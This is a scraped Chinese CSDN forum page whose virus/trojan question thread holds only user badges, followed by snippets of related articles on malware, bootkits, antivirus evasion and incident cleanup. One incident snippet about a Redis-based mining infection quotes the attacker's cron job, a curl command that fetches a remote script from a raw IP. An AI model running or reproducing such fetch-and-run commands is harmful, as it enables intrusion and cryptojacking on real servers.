CSDN论坛 > Windows专区 > 安全技术/病毒

木马? 病毒??????? [问题点数:100分,结帖人Theleme]

Bbs1
本版专家分:0
结帖率 100%
CSDN今日推荐
Bbs8
本版专家分:43548
Blank
微软MVP 2005年7月 荣获微软MVP称号
2008年7月 荣获微软MVP称号
2007年7月 荣获微软MVP称号
2006年7月 荣获微软MVP称号
Blank
红花 2005年5月 Windows专区大版内专家分月排行榜第一
2005年4月 Windows专区大版内专家分月排行榜第一
2005年3月 Windows专区大版内专家分月排行榜第一
Blank
黄花 2005年6月 Windows专区大版内专家分月排行榜第二
Bbs7
本版专家分:13778
Bbs2
本版专家分:307
Bbs7
本版专家分:21742
Blank
蓝花 2003年7月 Windows专区大版内专家分月排行榜第三
Bbs1
本版专家分:0
Bbs1
本版专家分:0
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs2
本版专家分:438
Blank
黄花 2004年7月 VC/MFC大版内专家分月排行榜第二
匿名用户不能发表回复!登录|注册
其他相关推荐
病毒、木马、蠕虫与恶意代码关键点
病毒:寄生存在,所谓寄生,就是病毒的指令存在于其它可执行程序的空指令部分。如下图为一个标准的计寄生形式的病毒: 运行可执行程序,一个jmp指令会导致程序跳转到病毒所在指令处开始执行,执行完毕之后跳转回正常代码区开始执行可执行程序。木马:独立存在,一般具有潜伏期(一般是.exe、.com、.pif、.scr等为后缀的文件) 蠕虫:强制传染性,常利用主机的漏洞在网络中传播。如下为一个蠕虫的基本结
从病毒、木马到APT
1983年11月3日,还是南加州大学在读研究生的弗雷德·科恩在UNIX系统下,编写了第一个会自动复制并在计算机间进行传染从而引起系统死机的病毒,因此被誉为“计算机病毒之父”。
病毒木马查杀实战第023篇:MBR病毒之引导区的解析
前言        引导型病毒指寄生在磁盘引导区或主引导区的计算机病毒。这种病毒利用系统引导时,不对主引导区的内容正确与否进行判别的缺点,在引导系统的过程中入侵系统,驻留内存,监视系统运行,伺机传染和破坏。按照引导型病毒在硬盘上的寄生位置又可细分为主引导记录病毒和分区引导记录病毒。我们未来的几次课,会专门从各个角度来分析这种病毒的特点,阐述病毒原理,提出应对方法。而本次课程的内容主要来讨论一下引
暗云Ⅲ: 迄今为止最复杂的木马之一
肆虐多年的暗云木马近日出现多个变种,会感染硬盘主引导记录(MBR),开机启动时间比杀毒软件还要早,因此不但无法查杀,即使格式化硬盘也不能根治。 暗云木马是迄今为止最复杂的木马之一,曾经感染过数百万电脑,它用了很多复杂的新技术来长期潜伏在系统中,尤其是借助BootKit直接感染硬盘引导分区。 攻击者精心制作的这个恶意程序功能复杂,开发技巧很高,采用多种技术方案对抗安全软件,并且更新频繁。
病毒木马查杀实战第018篇:病毒特征码查杀之基本原理
前言       在本系列的导论中,我曾经在“病毒查杀方法”中简单讲解过特征码查杀这种方式。而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定。一般来说,类似于MD5以及CRC32这样的算法,在病毒大规模爆发时是可以提高查杀效率的,但是传统的更为常用的方法是采用以静态分析文件的结构为主并结合动态分析的方法,通过反汇编来寻找病毒的内容代码段、入口点代
记一次Linux服务器上查杀木马经历
转载自:http://www.cnblogs.com/kerrycode/p/4754820.html 开篇前言      Linux服务器一直给我们的印象是安全、稳定、可靠,性能卓越。由于一来Linux本身的安全机制,Linux上的病毒、木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒、木马;以为它没有安全漏洞。所以很
一个感染型木马病毒分析(二)
作者:龙飞雪 0x1序言 前面已经对感染型木马病毒resvr.exe的病毒行为进行了具体的分析见一个感染型木马病毒分析(一),但是觉得还不够,不把这个感染型木马病毒的行为的亮点进行分析一下就有点遗憾了。下面就针对该感染型木马病毒的感染性、木马性以及被感染文件的恢复几个方面进行具体的分析和说明,直观感受一下病毒的感染性、木马性质。   0x2病毒木马性的分析---远程
阿里云挖矿批处理病毒的解决方案
背景打开了redis的外网端口,redis是由root用户启动,所以入侵者拿到了root权限,在批处理中加入了两个定时任务,每5秒钟去远程代理服务器(美国)获取脚本。分析查看cpu使用率较高的进程 top -c,发现是调用了tmp下的一个文件,tmp下公有多个可疑文件。crontab -l查看,发现有两个定时任务,/5 curl -fsSL http://165.225.157.157:8000/...
介绍下加壳、脱壳以及如何病毒免杀技术与原理
介绍下加壳、脱壳以及如何病毒免杀技术与原理 在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的
Skypee(AutoIt3木马)专杀工具
Skypee(AutoIt3木马)专杀工具
关闭